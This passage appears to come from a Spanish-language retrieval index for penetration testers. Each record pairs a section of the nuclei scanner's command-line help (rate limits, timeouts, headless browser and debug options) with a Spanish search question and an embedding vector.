-0.04445, -0.00096, -0.0041, -0.07207, 0.04787, -0.00743]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "RATE-LIMIT:\n -rl, -rate-limit int maximum number of requests to send per second (default 150)\n -rld, -rate-limit-duration value maximum number of requests to send per second (default 1s)\n -rlm, -rate-limit-minute int maximum number of requests to send per minute (DEPRECATED)\n -bs, -bulk-size int maximum number of hosts to be analyzed in parallel per template (default 25)\n -c, -concurrency int maximum number of templates to be executed in parallel (default 25)\n -hbs, -headless-bulk-size int maximum number of headless hosts to be analyzed in parallel per template (default 10)\n -headc, -headless-concurrency int maximum number of headless templates to be executed in parallel (default 10)\n -jsc, -js-concurrency int maximum number of javascript runtimes to be executed in parallel (default 120)\n -pc, -payload-concurrency int max payload concurrency for each template (default 25)\n -prc, -probe-concurrency int http probe concurrency with httpx (default 50)", "indexar": "cual es un programa con muchas opciones para ejecutar scripts de JavaScript y payloads concurrentes?", "v": [0.12924, 0.08257, -0.11601, -0.12313, 0.07333, -0.17806, 0.05612, -0.00766, -0.01706, 0.00469, -0.05008, -0.03688, 0.01471, -0.065, -0.06879, 0.05874, 0.03816, -0.0647, 0.03215, 0.01439, 0.00299, -0.00766, -0.01696, -0.00329, -0.05365, 0.07772, -0.03243, 0.05527, -0.1873, -0.05707, -0.00636, 0.08754, 0.08987, -0.0849, 0.00329, 0.06669, -0.01698, 0.11482, 0.00311, 0.09491, 0.03512, 0.05305, -0.17035, 0.00544, 0.03912, -0.01447, 0.04914, 0.06668, 0.03027, -0.16979, 0.05207, 0.11272, -0.12494, 0.12224, 0.02611, 0.0304, 0.05496, -0.17582, -0.12722, 0.01073, 0.00719, -0.02469, -0.03548, -0.07366, 0.0264, -0.04506, -0.01634, -0.03992, 0.00097, -0.0318, -0.05018, 0.05596, -0.15975, 0.01582, 0.09269, 0.02897, -0.12896, -0.03016, 0.06909, 0.09509, -0.03523, -0.07079, -0.01413, 0.14119, -0.0588, -0.05497, -0.08362, -0.01232, -0.02521, -0.03059, 0.11977, 0.02402, -0.06813, 0.10886, 0.04352, -0.08591, 0.15079, -0.0241, 0.08402, 0.0677, 0.00204, -0.0209, -0.03423, 0.06764, 0.02801, 0.15442, 0.08285, -0.06326, -0.02581, 0.01498, 0.05146, -0.01975, -0.00895, -0.0152, -0.0306, -0.06842, -0.03095, 0.01576, 0.0862, -0.08348, -0.10571, 0.08759, -0.09135, -0.04095, 0.08342, -0.00618, -0.03184, 0.07379, 0.01113, 0.02414, -0.08061, 0.06441, -0.04945, -0.02362, -0.02373, 0.06334, 0.14213, 0.0045, -0.01081, -0.04545, 0.09526, 0.01169, 0.10087, 0.03984, 0.07814, -0.00731, -0.02666, -0.05378, -0.05802, 0.01416, 0.03731, -0.00586, -0.03532, 0.06228, -0.03316, -0.11913, 0.03846, 0.01701, -0.03175, 0.06971, -0.0065, 0.05591, -0.06782, 0.01498, 0.05565, -0.02769, -0.04335, 0.00298, 0.00903, 0.1124, 0.02389, 0.05204, 0.03406, -0.0603, -0.02029, -0.07963, -0.04868, -0.08091, 0.03473, -0.01799, -0.06783, 0.02731, 0.00446, 0.06664, -0.0283, -0.07235, -0.03278, 0.03491, 0.03019, 0.02251, 0.01186, 0.07363, -0.07805, -0.08904, -0.00372, 0.00224, -0.06699, -0.02872, -0.02653, 0.00848, -0.03346, 0.03054, 0.00014, -0.04849, 0.01252, 0.05158, -0.03549, 0.02525, -0.02049, 0.02068, 0.036, -0.06105, 0.05878, -0.00287, -0.06842, -0.00791, 0.0212, 0.01129, 0.05177, 0.03945, -0.00855, 0.00335, 0.05593, -0.06458, -0.0143, -0.03175, 0.06578, 0.03426, 0.05819, 0.01082, -0.03254, -0.03799, -0.03248, -0.00845, 0.05507, 0.01696, 0.00125, -0.0133, -0.05047, -0.05048, 0.02457, 0.07137, -0.05458, -0.10673, -0.04301, -0.0057, -0.07466, -0.01574, 0.04274, 0.01229, -0.02933, 0.06109, 0.0022, -0.05792, 0.05775, 0.01189]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "OPTIMIZATIONS:\n -timeout int time to wait in seconds before timeout (default 10)\n -retries int number of times to retry a failed request (default 1)\n -ldp, -leave-default-ports leave default HTTP/HTTPS ports (eg. host:80,host:443)\n -mhe, -max-host-error int max errors for a host before skipping from scan (default 30)\n -te, -track-error string[] adds given error to max-host-error watchlist (standard, file)\n -nmhe, -no-mhe disable skipping host from scan based on errors\n -project use a project folder to avoid sending same request multiple times\n -project-path string set a specific project path (default \"/tmp\")\n -spm, -stop-at-first-match stop processing HTTP requests after the first match (may break template/workflow logic)\n -stream stream mode - start elaborating without sorting the input\n -ss, -scan-strategy value strategy to use while scanning(auto/host-spray/template-spray) (default auto)\n -irt, -input-read-timeout value timeout on input read (default 3m0s)\n -nh, -no-httpx disable httpx probing for non-url input\n -no-stdin disable stdin processing", "indexar": "con que programa puedo hacer un escaneo de redes con opciones de tiempo de espera y reintentos", "v": [-0.17904, -0.01556, -0.23892, -0.00793, 0.0626, 0.02312, -0.10021, -0.0445, -0.06095, -0.14829, -0.11257, -0.09093, 0.09239, -0.10969, 0.02406, 0.12659, 0.03262, 0.11246, 0.21948, 0.06151, -0.10155, -0.02383, -0.09573, 0.04477, 0.04691, 0.00767, 0.03291, 0.11656, -0.0933, 0.09723, -0.02742, 0.06778, 0.04111, -0.06205, 0.02016, 0.04365, 0.09275, 0.12632, 0.0896, 0.0016, -0.03257, 0.02974, -0.12005, -0.05977, 0.11426, 0.01109, -0.06626, -0.00348, -0.06076, -0.07334, -0.04174, -0.03181, -0.06426, 0.02458, 0.00221, -0.04925, 0.09497, -0.14749, -0.0851, -0.07121, 0.04407, 0.04778, 0.05013, 0.01908, -0.00358, 0.00053, 0.03221, 0.14206, -0.03573, 0.06896, -0.04509, 0.05274, -0.00494, -0.0894, -0.01961, 0.05296, -0.03738, 0.01812, -0.00839, -0.04361, -0.092, -0.00937, -0.03915, 0.06737, -0.10404, -0.05837, 0.00612, -0.03742, -0.09912, -0.04761, 0.02412, 0.00862, 0.04904, 0.08477, 0.08621, -0.01422, 0.04753, 0.001, 0.01159, 0.04009, 0.04612, 0.01332, -0.09471, 0.12662, -0.03015, 0.0539, 0.0755, 0.009, -0.02752, 0.03309, 0.00055, 0.07485, -0.07084, -0.09506, -0.06507, 0.02169, -0.03202, -0.00046, 0.01481, 0.02861, -0.02083, 0.03849, -0.13452, 0.01313, 0.10291, -0.00019, -0.03566, 0.04005, 0.04642, 0.03242, -0.0239, 0.04971, -0.03204, -0.11777, -0.07655, -0.09023, -0.03654, -0.05874, 0.04153, -0.06829, -0.04204, 0.01636, 0.0523, -0.04846, 0.06284, 0.03202, -0.03968, -0.13424, -0.06056, -0.04786, 0.04421, 0.05594, -0.02046, 0.06325, -0.06161, 0.02878, -0.01051, -0.02216, 0.03378, 0.02553, -0.05823, 0.00849, -0.04003, -0.0404, 0.04395, -0.01324, -0.0744, -0.01246, -0.00862, 0.02672, -0.0744, 0.16789, 0.00214, -0.10386, -0.01973, 0.04429, -0.03905, -0.03264, -0.03034, 0.00243, -0.08464, -0.00738, 0.03137, 0.00799, 0.02057, -0.13048, -0.03865, 0.0482, -0.03528, 0.00123, 0.01573, 0.0217, 0.00608, 0.0843, -0.02347, -0.05473, 0.03861, 0.03836, 0.04513, 0.00834, -0.11215, -0.0014, 0.01653, -0.00291, -0.02579, 0.05081, -0.05612, 0.03601, 0.00512, 0.09985, 0.0182, -0.02906, 0.08264, -0.01908, -0.02587, -0.01724, 0.07254, -0.01837, 0.01915, 0.05268, 0.00547, 0.00906, 0.02751, 0.05915, -0.07172, -0.07132, 0.0239, 0.01447, 0.02806, 0.00124, -0.02145, -0.08068, -0.01992, -0.0403, 0.02046, 0.00645, 0.05563, -0.0431, -0.02161, -0.00461, -0.00264, 0.05572, -0.00994, 0.0509, -0.02732, -0.03757, -0.09823, -0.00199, -0.00324, -0.03686, -0.02828, 0.01951, 0.05212, -0.05455, 0.07214, -0.02768]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "OPTIMIZATIONS:\n -timeout int time to wait in seconds before timeout (default 10)\n -retries int number of times to retry a failed request (default 1)\n -ldp, -leave-default-ports leave default HTTP/HTTPS ports (eg. host:80,host:443)\n -mhe, -max-host-error int max errors for a host before skipping from scan (default 30)\n -te, -track-error string[] adds given error to max-host-error watchlist (standard, file)\n -nmhe, -no-mhe disable skipping host from scan based on errors\n -project use a project folder to avoid sending same request multiple times\n -project-path string set a specific project path (default \"/tmp\")\n -spm, -stop-at-first-match stop processing HTTP requests after the first match (may break template/workflow logic)\n -stream stream mode - start elaborating without sorting the input\n -ss, -scan-strategy value strategy to use while scanning(auto/host-spray/template-spray) (default auto)\n -irt, -input-read-timeout value timeout on input read (default 3m0s)\n -nh, -no-httpx disable httpx probing for non-url input\n -no-stdin disable stdin processing", "indexar": "hay alguna herramienta para automatizar pruebas HTTP que pueda dejar los puertos predeterminados", "v": [-0.06693, 0.01065, -0.18535, -0.20326, 0.05845, -0.07781, 0.13121, -0.04402, -0.10418, -0.02517, -0.16432, 0.08471, 0.04094, 0.01079, 0.04928, -0.00024, 0.09684, -0.06396, 0.01766, -0.04347, 0.00959, -0.06488, -0.10976, -0.10486, -0.061, -0.05469, 0.00932, 0.08636, -0.28053, -0.0229, -0.02022, 0.05469, 0.02458, 0.0592, -0.04956, -0.0911, -0.0397, 0.10039, 0.09412, 0.111, 0.08059, 0.05758, -0.00532, 0.02458, 0.03985, 0.02533, -0.10457, -0.04087, 0.03379, -0.10889, 0.05742, -0.10238, -0.12967, -0.01229, -0.04828, 0.00029, 0.19318, -0.03647, 0.03104, -0.1585, -0.04479, -0.04174, 0.01856, 0.01066, 0.00167, -0.01527, 0.03561, 0.03904, -0.12947, 0.1275, -0.02165, 0.03594, 0.06427, -0.00723, 0.03613, -0.0312, -0.02966, 0.05867, 0.02901, 0.04987, 0.06769, -0.02858, -0.01678, 0.02078, -0.07803, -0.10223, -0.09004, -0.03422, 0.12251, -0.10898, 0.06176, 0.00551, 0.00121, 0.07602, -0.03084, -0.04569, 0.04207, -0.02914, 0.01376, -0.08216, 0.0851, 0.04572, -0.05383, 0.08542, 0.02316, 0.04501, 0.03942, 0.00851, 0.02842, -0.04834, 0.10929, 0.05775, 0.00018, -0.04608, -0.03842, 0.0616, 0.05738, -0.04881, -0.00079, -0.08121, 0.02166, -0.04644, -0.08098, -0.03196, -0.03433, -0.01458, 0.0263, 0.09765, 0.01473, -0.03932, 0.06219, -0.02572, -0.12215, -0.00179, -0.05293, 0.05761, 0.04885, -0.15444, -0.03976, -0.08077, -0.09266, 0.06723, -0.05211, -0.06855, 0.07162, 0.01776, -0.04891, 0.00937, -0.05297, -0.03798, 0.01174, -0.0203, -0.06893, 0.01936, -0.09574, 0.07116, 0.06902, -0.00653, -0.05833, 0.06699, -0.01654, -0.0514, -0.01975, 0.04476, 0.01182, 0.07522, -0.03722, 0.04349, 0.02288, -0.01994, 0.03808, 0.08487, -0.0191, -0.08914, -0.00414, 0.02022, -0.08877, 0.00171, -0.03879, -0.04944, 0.01582, 0.0152, -0.04634, -0.0724, 0.0332, -0.05823, 0.0443, -0.07994, -0.00118, 0.0642, -0.00337, 0.00155, -0.09568, 0.0008, 0.07883, 0.0798, -0.00731, 0.00631, 0.02114, -0.0166, -0.04129, -0.04535, 0.04915, -0.03326, -0.03531, 0.07322, 0.00098, -0.02174, 0.00427, -0.00907, 0.01088, -0.02416, 0.04118, -0.04639, -0.03224, 0.04443, 0.01146, 0.02856, -0.01278, 0.04534, -0.04546, 0.0246, 0.00649, 0.03056, -0.00205, 0.08402, 0.08777, 0.02461, 0.04757, -0.01941, 0.00517, -0.00023, -0.02458, 0.02064, 0.04035, -0.0091, 0.01355, -0.00071, -0.028, -0.06055, 0.01062, 0.02169, 0.02109, -0.05209, 0.0073, -0.08694, -0.04298, -0.04067, -0.00905, -0.01452, -0.03075, -0.00863, 0.00548, -0.08301, 0.00619, 0.02169]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "HEADLESS:\n -headless enable templates that require headless browser support (root user on Linux will disable sandbox)\n -page-timeout int seconds to wait for each page in headless mode (default 20)\n -sb, -show-browser show the browser on the screen when running templates with headless mode\n -ho, -headless-options string[] start headless chrome with additional options\n -sc, -system-chrome use local installed Chrome browser instead of nuclei installed\n -lha, -list-headless-action list available headless actions", "indexar": "que programa sirve para automatizar la descarga de pΓ‘ginas web sin mostrar la ventana del navegador?", "v": [-0.02908, 0.01818, -0.18457, -0.27967, -0.02615, -0.09427, 0.01461, -0.09818, -0.00489, -0.08189, 0.02714, -0.19015, -0.03969, -0.06161, 0.00117, 0.06285, 0.09713, -0.07257, 0.12291, 0.05229, 0.04882, -0.00527, 0.02696, -0.10752, -0.08662, -0.01395, -0.03538, -0.03845, -0.12976, -0.02887, -0.08776, -0.02443, 0.0675, -0.03019, -0.00622, 0.01422, 0.14018, 0.03998, 0.01945, -0.00656, 0.03653, 0.04402, -0.11208, 0.08854, -0.01656, -0.00366, 0.04117, -0.07193, 0.00458, -0.03584, -0.03588, -0.00884, -0.06061, 0.07173, -0.02887, -0.08557, 0.14428, -0.16961, 0.09699, -0.05823, 0.06888, 0.1108, 0.00593, 0.00353, -0.01539, -0.01486, 0.02389, 0.04775, 0.03557, 0.0353, 0.02574, 0.0467, 0.06168, 0.009, 0.00873, 0.06018, -0.12405, 0.00447, 0.07219, -0.00415, 0.08721, 0.03142, -0.09494, -0.0002, -0.08166, -0.08402, -0.03678, -0.03826, 0.04144, -0.09447, 0.08746, 0.09818, 0.00516, 0.00151, 0.00517, -0.16369, 0.09812, -0.00973, 0.09165, -0.03017, 0.02282, -0.07466, -0.03914, 0.03813, 0.07966, 0.08172, 0.04254, -0.06313, -0.05495, 0.0175, 0.04184, -0.04016, -0.06449, -0.07419, -0.05014, 0.03088, 0.00774, -0.01162, -0.00256, -0.15764, -0.08849, -0.01479, -0.12351, 0.03835, 0.01887, 0.04676, 0.00805, 0.1034, -0.06952, 0.00125, 0.05086, -0.0373, -0.09025, 0.05468, -0.05026, -0.02168, -0.03671, -0.06268, -0.04019, -0.09673, 0.04944, 0.03032, -0.03917, 0.00136, 0.077, -0.06151, -0.00545, -0.00947, -0.10089, -0.03807, 0.01466, -0.00025, 0.02069, 0.02106, -0.01453, 0.0009, -0.01853, 0.01476, -4e-05, 0.01929, -0.06661, 0.00875, 0.06592, 0.0234, 0.02808, -0.00673, -0.07995, 0.03529, 0.11928, 0.07335, 0.01499, 0.09994, 0.02059, -0.11532, -0.01281, 0.01296, -0.03808, 0.00565, 0.0353, 0.02337, -0.0522, -0.03245, 0.05013, 0.00526, -0.12239, -0.05653, -0.00426, -0.06506, -0.0416, -0.00038, -0.014, -0.00304, -0.13143, 0.03407, 0.09414, 0.01627, -0.07283, -0.01089, 0.06963, -0.05912, -0.06326, -0.03881, 0.03078, 0.00711, 0.03648, 0.11273, 0.04577, -0.01882, 0.02166, 0.05956, 0.01298, -0.04365, 0.03549, -0.0267, -0.01653, -0.06682, 0.06447, 0.00477, 0.01433, 0.01958, 0.03517, -0.04538, 0.00787, 0.04821, 0.0604, -0.00496, 0.08701, 0.04125, -0.00643, 0.00072, -0.09032, -0.0331, -0.01516, 0.00737, 0.02222, -0.01445, 0.00543, 0.01516, -0.06493, -0.07869, -0.04839, 0.03573, 0.01812, -0.03436, -0.01529, -0.04881, -0.08465, -0.02462, 0.06913, 0.01319, -0.09219, 0.03297, 0.00122, -0.00107, 0.00928, 0.04942]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "HEADLESS:\n -headless enable templates that require headless browser support (root user on Linux will disable sandbox)\n -page-timeout int seconds to wait for each page in headless mode (default 20)\n -sb, -show-browser show the browser on the screen when running templates with headless mode\n -ho, -headless-options string[] start headless chrome with additional options\n -sc, -system-chrome use local installed Chrome browser instead of nuclei installed\n -lha, -list-headless-action list available headless actions", "indexar": "cual es una herramienta que pueda ejecutar acciones en Chrome desde el fondo del sistema?", "v": [-0.0411, 0.08804, -0.03261, -0.06538, 0.07171, -0.18573, 0.09559, 0.0863, -0.09643, -0.14713, -0.15862, -0.00088, -0.09779, -0.11334, 0.10077, -0.00771, 0.11725, -0.11331, -0.05514, 0.01385, -0.06878, -0.13527, -0.12123, -0.02755, -0.1489, 0.06452, -0.02483, -0.06653, -0.1621, -0.0371, 0.02168, -0.01214, 0.18533, -0.06189, -0.00658, -0.12631, -0.01544, -0.00822, -0.01713, 0.13741, -0.05174, 0.00337, -0.12891, 0.05928, -0.00243, 0.00378, -0.0224, -0.04287, 0.10092, -0.06769, -0.0778, -0.02968, -0.24884, -0.07921, -0.01053, -0.08715, 0.12604, -0.14154, -0.0078, -0.13104, -0.03048, 0.03227, 0.02404, -0.05751, 0.02254, 0.00107, -0.02622, -0.02465, -0.05647, 0.16235, 0.01001, -0.00251, -0.01122, 0.11877, 0.04694, 0.00293, 0.04493, 0.07651, -0.00296, -0.03979, 0.05923, -0.01484, -0.13548, 0.0379, -0.03336, -0.11611, 0.02727, -0.04152, 0.04402, -0.02632, 0.01949, -0.0003, 0.00625, 0.0525, 0.03808, -0.04365, 0.05508, -0.08409, -0.00317, -0.08123, 0.12429, -0.0743, -0.10005, 0.04321, -0.01218, 0.02064, -0.07834, 0.03554, -0.02829, -0.028, -0.03068, 0.04359, -0.00741, -0.02186, -0.01625, 0.0444, -0.07021, -0.04571, -0.00091, -0.0726, -0.04902, 0.02967, -0.14146, -0.07063, 0.09928, 0.0093, -0.02574, 0.03001, 0.00881, -0.01307, 0.00893, -0.02294, -0.03651, -0.01464, -0.07263, 0.03687, 0.00191, -0.06177, -0.0199, -0.06077, 0.06315, 0.05891, 0.02091, -0.10298, 0.09614, -0.00585, 0.07775, -0.03262, -0.04734, -0.04041, 0.01737, 0.00245, -0.03837, 0.01387, -0.00547, 0.00717, -0.05124, 0.02134, -0.00314, 0.02955, -0.0257, -0.08096, 0.0364, 0.06938, 0.02773, -0.00871, -0.06143, 0.02882, 0.06363, 0.03815, 0.027, 0.05236, 0.07077, -0.03269, 0.04114, -0.0576, -0.06685, -0.01802, 0.05982, 0.01658, -0.03905, 0.0295, 0.00992, -0.03369, 0.01089, -0.04391, 0.01636, 0.01658, -0.01847, 0.03692, -0.02868, 0.0319, -0.07236, -0.00523, 0.00014, 0.02524, -0.06083, -0.04407, 0.0328, 0.00992, -0.11097, 0.01645, 0.00029, -0.08145, -0.01387, 0.07252, 0.00609, -0.00552, -0.04586, 0.05347, 0.01715, 0.03777, 0.0644, 0.00402, -0.01071, 0.01136, 0.00681, 0.01045, -0.00937, 0.01403, 0.03251, -0.02118, 0.07508, -0.02191, -0.0367, -0.042, -0.00242, 0.02896, -0.04163, -0.04167, 0.00406, -0.03855, 0.01753, -0.01358, 0.02648, -0.01744, 0.02079, -0.04355, -0.02573, -0.04891, 0.02463, 0.09962, 0.02001, -0.08015, -0.03626, -0.02707, -0.05054, -0.01792, -0.02045, -0.10223, -0.00936, 0.01705, 0.04185, -0.07904, -0.00014, 0.00472]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "HEADLESS:\n -headless enable templates that require headless browser support (root user on Linux will disable sandbox)\n -page-timeout int seconds to wait for each page in headless mode (default 20)\n -sb, -show-browser show the browser on the screen when running templates with headless mode\n -ho, -headless-options string[] start headless chrome with additional options\n -sc, -system-chrome use local installed Chrome browser instead of nuclei installed\n -lha, -list-headless-action list available headless actions", "indexar": "quΓ© software permite configurar tiempos de espera y opciones adicionales al usar un navegador oculto?", "v": [0.09598, 0.10487, -0.24913, -0.16274, 0.01108, -0.05578, -0.00718, -0.07412, -0.08271, -0.14916, -0.12886, -0.14038, -0.01451, -0.01725, -0.03764, -0.05642, 0.11745, -0.0857, 0.11359, 0.1032, -0.019, -0.06968, -0.10123, -0.03123, -0.02147, -0.06935, -0.01291, -0.05781, -0.11808, -0.01343, -0.01913, 0.05354, 0.07969, -0.00849, -0.081, 0.07337, 0.01905, 0.01159, 0.0535, -0.05746, 0.08563, -0.04284, -0.0458, 0.08006, 0.1112, 0.01363, -0.03145, 0.07489, 0.03513, -0.07541, 0.05443, -0.02724, -0.13905, 0.04898, 0.05471, -0.01429, 0.18493, -0.12386, 0.00582, -0.098, 0.06053, 0.04936, 0.05942, 0.12104, 0.00548, -0.05836, -0.03073, 0.0489, -0.03666, 0.02073, -0.04401, 0.03961, 0.03257, 0.02687, 0.10097, 0.05352, 0.00134, 0.02283, 0.06489, 0.03371, -0.0114, 0.01178, -0.08025, 0.10151, -0.11649, -0.12484, 0.00518, 0.04361, -0.0595, -0.05596, 0.13321, 0.08821, -0.02461, 0.0112, 0.06543, -0.0655, 0.10317, 0.02361, -0.01161, 0.11272, 0.07376, -0.01069, -0.07365, 0.16159, -0.03579, -0.0056, 0.03443, -0.12227, 0.00237, -0.0273, -0.0111, 0.09146, -0.03986, -0.05266, 0.08597, 0.01924, 0.07328, -0.06918, -0.01535, -0.11576, 0.01903, 0.03339, -0.1252, -0.02334, 0.02907, -0.01397, 0.05524, 0.04762, -0.01977, -0.01905, -0.03385, -0.17874, -0.04303, 0.00491, -0.13864, 0.04756, -0.05292, -0.01335, 0.01141, -0.00733, 0.03772, -0.05836, -0.02938, -0.02842, 0.11886, -0.06785, -0.04749, -0.00599, -0.04781, -0.07596, 0.04993, -0.03191, 0.03189, -0.0066, -0.02917, 0.02924, -0.01475, -0.01191, -0.09316, 0.03267, -0.07638, 0.01179, -0.01123, -0.01186, -0.02559, -0.07675, -0.06229, -0.03766, 0.0632, 0.07049, 0.04515, 0.03737, 0.03112, -0.06141, -0.01732, 0.01083, -0.00339, -0.02825, -0.00947, 0.0112, -0.00878, -0.03296, 0.02046, -0.02066, -0.02764, -0.07077, -0.0245, -0.04006, -0.05353, -0.01571, -0.01707, 0.06089, -0.02964, -0.01407, 0.04544, -0.02558, -0.02915, -0.05365, 0.04127, -0.02065, -0.04751, 0.01369, -0.0002, -0.03757, 0.03429, 0.04675, -0.03671, 0.05649, -0.00276, 0.04984, 0.00064, -0.06733, 0.09935, -0.017, -0.01457, 0.01809, 0.01937, -0.02527, 0.01212, -0.07215, 0.00272, -0.01971, -0.00118, 0.01684, 0.04428, 0.01454, 0.00663, 0.08454, 0.00076, 0.00178, -0.0307, -0.01887, -0.06946, 0.00949, 0.01356, -0.02347, 0.04787, 0.02187, -0.04499, 0.00629, 0.00711, 0.10201, 0.02895, -0.01983, -0.05606, -0.05261, -0.09708, 0.00414, 0.02323, -0.03355, -0.07032, 0.04927, 0.02602, -0.05863, -0.00356, 0.00727]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "DEBUG:\n -debug show all requests and responses\n -dreq, -debug-req show all sent requests\n -dresp, -debug-resp show all received responses\n -p, -proxy string[] list of http/socks5 proxy to use (comma separated or file input)\n -pi, -proxy-internal proxy all internal requests\n -ldf, -list-dsl-function list all supported DSL function signatures\n -tlog, -trace-log string file to write sent requests trace log\n -elog, -error-log string file to write sent requests error log\n -version show nuclei version\n -hm, -hang-monitor enable nuclei hang monitoring\n -v, -verbose show verbose output\n -profile-mem string generate memory (heap) profile & trace files\n -vv display templates loaded for scan\n -svd, -show-var-dump show variables dump for debugging\n -vdl, -var-dump-limit int limit the number of characters displayed in var dump (default 255)\n -ep, -enable-pprof enable pprof debugging server\n -tv, -templates-version shows the version of the installed nuclei-templates\n -hc, -health-check run diagnostic check up", "indexar": "quΓ© herramienta sirve para probar proxies HTTP?", "v": [-0.06616, -0.00293, -0.20732, -0.12669, 0.10448, -0.14576, 0.04921, -0.05729, 0.09025, -0.02585, -0.1392, 0.09589, 0.05455, -0.08704, 0.04368, 0.00373, 0.10007, -0.13705, -0.00738, -0.01387, -0.00977, 0.01284, -0.18395, -0.10684, -0.08034, -0.09822, 0.07282, 0.08052, -0.19418, -0.04434, -0.00203, -0.04375, -0.00983, 0.08503, -0.1579, -0.0231, -0.05241, 0.07473, 0.03594, 0.08905, 0.05114, -0.03364, -0.01439, 0.05105, -0.05841, 0.01356, -0.09208, -0.05627, -0.03222, -0.01863, -0.03023, -0.13297, -0.21441, 0.07118, -0.0724, 0.00487, 0.10759, -0.1511, -0.01299, -0.11217, -0.06891, -0.06953, -0.01146, -0.0475, -0.00507, -0.12609, -0.03941, 0.00922, -0.17521, 0.05298, -0.03901, 0.06107, 0.04976, -0.05415, 2e-05, 0.00987, -0.01669, 0.0121, 0.04019, 0.0022, 0.07387, 0.00626, -0.09086, 0.0292, -0.07314, -0.06469, -0.02898, -0.01379, 0.10125, -0.06354, 0.08866, 0.12482, -0.03557, -0.03207, 0.03263, -0.06298, 0.11383, -0.0934, 0.05642, -0.06157, 0.10665, -0.04217, -0.13683, 0.07003, -0.01775, 0.05568, -0.00284, 0.00688, -0.06909, -0.05453, 0.07394, -0.0143, -0.09439, 0.03888, 0.02916, 0.04537, -0.02713, -0.0153, -0.01232, -0.07075, 0.00256, 0.00428, -0.10573, 0.01389, -0.03459, 0.02627, -0.02259, 0.0408, 0.02627, -0.02868, 0.02147, -0.04345, -0.05094, 0.048, -0.02292, 0.00928, 0.11801, -0.16288, -0.02653, -0.0314, 0.00305, 0.02128, -0.06107, -0.08684, 0.02851, 0.02409, 0.04674, 0.02891, -0.01389, 0.01394, 0.00504, -0.05574, -0.04892, 0.02811, -0.09946, -0.0286, -0.02539, -0.03538, -0.07732, 0.07353, -0.00079, -0.04665, 0.06566, 0.05502, 0.02022, 0.0085, -0.05283, 0.00107, 0.09049, 0.03057, 0.04989, 0.05459, 0.00319, -0.13182, -0.02104, -0.03231, -0.07899, -0.00837, 0.01284, -0.08306, -0.00491, -0.00447, -0.02503, -0.0126, 0.01695, -0.02257, 0.05682, -0.01065, -0.00913, 0.0559, -0.00924, 0.03286, -0.05768, -0.01277, 0.06674, 0.0353, -0.00673, -0.06321, 0.03235, -0.00129, -0.04114, -0.06426, 0.0164, -0.04735, 0.01127, 0.02441, 0.01764, -0.02917, -0.03436, -0.01252, 0.02716, -0.00335, 0.04546, -0.01912, -0.00056, -0.00454, 0.03495, 0.05047, -0.03537, 0.03174, -0.01951, -0.02058, 0.00821, 0.00514, 0.02621, 0.04344, 0.05297, -0.03016, 0.03397, -0.04511, 0.02263, -0.0073, -0.05591, 0.01595, 0.02561, -0.0477, 0.02425, -0.00315, -0.05873, -0.03878, -0.00276, 0.02797, -0.03391, -0.03001, -0.00044, -0.0767, -0.02439, -0.05306, -0.02868, -0.03614, -0.05494, -0.01841, 0.03881, -0.03345, -0.01712, 0.01436]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "DEBUG:\n -debug show all requests and responses\n -dreq, -debug-req show all sent requests\n -dresp, -debug-resp show all received responses\n -p, -proxy string[] list of http/socks5 proxy to use (comma separated or file input)\n -pi, -proxy-internal proxy all internal requests\n -ldf, -list-dsl-function list all supported DSL function signatures\n -tlog, -trace-log string file to write sent requests trace log\n -elog, -error-log string file to write sent requests error log\n -version show nuclei version\n -hm, -hang-monitor enable nuclei hang monitoring\n -v, -verbose show verbose output\n -profile-mem string generate memory (heap) profile & trace files\n -vv display templates loaded for scan\n -svd, -show-var-dump show variables dump for debugging\n -vdl, -var-dump-limit int limit the number of characters displayed in var dump (default 255)\n -ep, -enable-pprof enable pprof debugging server\n -tv, -templates-version shows the version of the installed nuclei-templates\n -hc, -health-check run diagnostic check up", "indexar": "con quΓ© puedo ver todos los mensajes enviados y recibidos por un programa?", "v": [0.12177, 0.23741, -0.04453, -0.03432, -0.02592, -0.03932, 0.01283, -0.05798, 0.04737, -0.16557, -0.0258, -0.00216, 0.09388, -0.03023, -0.0304, 0.08737, 0.15107, 0.11882, 0.09957, 0.02397, 0.09796, 0.03726, -0.06276, -0.08297, -0.04619, 0.03387, 0.04971, 0.02428, 0.05949, -0.03189, 0.09824, -0.12474, 0.04619, -0.02171, 0.05574, 0.05359, 0.05602, 0.13117, 0.00209, 0.11442, 0.07661, -0.03062, -0.03794, -0.06478, 0.04081, -0.11152, 0.03319, 0.04475, 0.0106, -0.09036, -0.03639, -0.00521, -0.04727, 0.02065, -0.06218, -0.05767, 0.09431, -0.07113, 0.03591, -0.00012, 0.00248, 0.07932, 0.01893, -0.05448, 0.03107, -0.05173, 0.12898, -0.02368, -0.13036, 0.01769, -0.01561, 0.00236, -0.02355, 0.01355, 0.0245, 0.11384, -0.16353, 0.10215, -0.10681, 0.02474, 0.02078, -0.06428, 0.00865, 0.00072, -0.01136, -0.06722, -0.02975, -0.06533, -0.07359, -0.13319, 0.04525, 0.04156, -0.00383, 0.11396, 0.0339, -0.03412, -0.03603, -0.01802, -0.00529, 0.12542, 0.03724, -0.0852, -0.05558, 0.07011, -0.07759, 0.0278, 0.08218, -0.0883, 